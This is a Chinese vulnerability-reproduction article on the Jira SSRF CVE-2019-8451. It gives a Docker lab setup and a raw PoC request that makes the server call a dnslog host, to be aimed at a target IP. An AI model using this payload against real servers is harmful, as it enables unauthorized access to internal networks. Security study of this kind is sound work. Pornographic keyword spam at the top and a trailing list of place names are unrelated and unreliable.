亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

發布時間:2021-12-10 15:38:49 來源:億速云 閱讀:341 作者:柒染 欄目:大數據

這期內容當中小編將會給大家帶來有關Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

0x00 簡介


JIRA是Atlassian公司出品的項目與事務跟蹤工具,被廣泛應用于缺陷跟蹤、客戶服務、需求收集、流程審批、任務跟蹤、項目跟蹤和敏捷管理等工作領域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠程攻擊者可以以Jira服務端的身份訪問內網資源。經分析,此漏洞無需任何憑據即可觸發。(來自奇安信CERT)

0x02 影響范圍


Jira < 8.4.0

0x03 環境搭建


在線靶場

開放時間(當前-9月29日20:00)

獲取方式(完成任意一個):

1、將本文轉發至朋友圈并配文字,截圖發至公眾號內

2、聯系作者,五元紅包

自行搭建

使用docker進行搭建,執行以下命令開啟環境

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

訪問ip:8080進行安裝

下圖選擇第二個

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

繼續即可

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

點擊next,后面漏了兩張圖

去生成JIRA使用許可證

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

生成之后找到License Key,回到頁面填上License Key繼續安裝

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

至此,安裝完畢。

0x04 漏洞利用


先訪問ip:8080,然后刷新抓包

將數據包替換為如下Poc:

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

其中ip替換為目標ip,共三處

@后面改為你的dnslog的地址

repeater發包

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

去dnslog中刷新查看結果,可以看到有流量經過

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

如果訪問未開放端口,結果是這樣的:

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

上述就是小編為大家分享的Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

裕民县| 阜阳市| 昆山市| 大足县| 武汉市| 教育| 台江县| 广汉市| 和平县| 东平县| 休宁县| 志丹县| 榕江县| 屯昌县| 锦屏县| 赤峰市| 桐梓县| 陇川县| 凤城市| 青阳县| 监利县| 永康市| 衡阳县| 平度市| 民县| 项城市| 荥阳市| 新田县| 绥化市| 旅游| 钦州市| 博兴县| 平遥县| 庆元县| 盘山县| 平定县| 泾源县| 青海省| 肥西县| 沅江市| 黄陵县|